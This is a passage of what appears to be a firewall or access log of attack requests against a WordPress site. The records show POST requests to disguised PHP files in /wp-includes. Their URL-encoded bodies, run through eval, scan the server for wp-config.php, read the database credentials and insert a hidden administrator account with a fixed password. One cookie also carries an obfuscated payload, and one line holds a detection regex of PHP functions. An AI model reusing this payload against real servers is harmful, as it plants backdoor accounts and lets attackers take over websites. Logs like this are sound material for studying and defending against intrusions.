%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B","POST \/wp-includes\/sodium_compat\/src\/Core\/Curve25519\/blogpage.php HTTP\/1.1\nsec-fetch-site:none\nsec-fetch-mode:navigate\ncookie:4=16a08a6222d8eba60e9d2af882976b3e; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvDHbvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYzAioaEyoaDvB2yzXTMcoTIspUI0K2AioaEyoaEmXPEjYPEwXFy7nJ5woUIxMFNxpQgNqJ5fnJ5eXPEjXGgyrTy0B319sJEcMFtvVJ5iqUqlqTWfVFVcBj==; 1=53; 0=71\ncontent-type:application\/x-www-form-urlencoded\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/100.0.4896.75 Safari\/537.36\nsec-ch-ua:\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"100\", \"Google Chrome\";v=\"100\"\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\nsec-ch-ua-mobile:?0\nsec-ch-ua-platform:\"Windows\"\nsec-fetch-user:?1\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\ncontent-length:12640\naccept:*\/*\naccept-encoding:gzip,deflate\nupgrade-insecure-requests:1\nsec-fetch-dest:document\n\nAJ=%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B"]
["2026-05-16 00:07:38","213.209.159.254","POST","\/wp-includes\/Text\/vfgsbqo\/pkaegxl\/l1ghdav\/mcp.bak.php","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/100.0.4896.75 Safari\/537.36","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> urOhQZ:eval(rawurldecode(\"%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B\"));","POST \/wp-includes\/Text\/vfgsbqo\/pkaegxl\/l1ghdav\/mcp.bak.php HTTP\/1.1\ncontent-type:application\/x-www-form-urlencoded\nsec-fetch-user:?1\ncontent-length:12663\nsec-fetch-dest:document\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\nsec-ch-ua:\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"100\", \"Google Chrome\";v=\"100\"\nhost:dewenlabels.com\nsec-ch-ua-mobile:?0\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/100.0.4896.75 